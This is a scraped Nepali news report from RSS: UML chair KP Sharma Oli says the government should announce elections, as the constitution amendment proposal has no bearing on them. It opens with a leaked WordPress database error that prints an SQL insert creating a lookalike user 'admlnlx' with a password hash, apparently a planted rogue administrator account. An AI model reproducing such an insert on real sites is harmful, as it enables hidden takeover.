WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwCeD7ztl/QtNUmJ9UPg4GfVBfXUXC/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 22:43:36', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस १२ –
नेकपा (एमाले) का अध्यक्ष केपी शर्मा ओलीले संविधान संशोधन प्रस्ताव र निर्वाचन घोषणाबीच कुनै सम्बन्ध नभएकाले सरकारले तत्काल निर्वाचन घोषणा गर्नुपर्ने बताउनुभएको छ ।
रिपोर्टर्स क्लब नेपालको एक प्रतिनिधिमण्डलले संविधान कार्यान्वयन र निर्वाचन गराउन भन्दै आज एमाले केन्द्रीय कार्यालय पुगेर ज्ञापनपत्र दिएपछि पत्रकारसँग कुरा गर्दै अध्यक्ष ओलीले संविधान बमोजिम तीनवटै तहको निर्वाचन गराएरै छाड्ने उद्घोषण पनि गर्नुभयो ।
उहाँले भन्नुभयो – ‘‘संविधानविपरीत संविधान संशोधन आएकाले संसद्मा छलफल गर्न रोकेका हौँ, तर संसद्मा अवरोध हुँदा सरकारलाई निर्वाचन घोषणा गर्न केले रोकेको छ रु के संसद्बाट निर्वाचन घोषणा गर्ने हो र रु’’
के एमाले पनि सरकारमा गएर निर्वाचन गराउने हो र भन्ने प्रश्नमा उहाँले भन्नुभयो – “वर्तमान सरकारको आयु चार महिना मात्रै छ । अहिलेको गठबन्धनमा रहेका दलमा सहमति कार्यान्वयनको संस्कार नभएकाले त्यसपछि के हुन्छ हेर्दै जाउँ तर एमालेले निर्वाचन गराउँछ ।”
उहाँले अख्तियार दुरुपयोग अनुसन्धान आयोगका प्रमुख आयुक्त लोकमानसिंह कार्कीविरुद्धको महाभियोग प्रस्ताव पारित हुने र संविधान संशोधन प्रस्ताव विफल हुने ठोकुवा गर्दै आफ्नो पार्टीले मुलुकलाई कुबाटोमा जान नदिई लोकतान्त्रिक बाटोमा अघि बढाउने जनाउनुभयो ।
एमाले प्रचार विभाग प्रमुख योगेश भट्टराईले संविधान संशोधन प्रस्तावका कारण उत्पन्न गतिरोध तोड्न सरकार लचिलो हुनुपर्ने बताउनुभयो ।
क्लबका अध्यक्ष ऋषि धमलाले अध्यक्ष ओलीलाई ध्यानाकर्षणपत्र हस्तान्तरण गर्नुभएको थियो । – रासस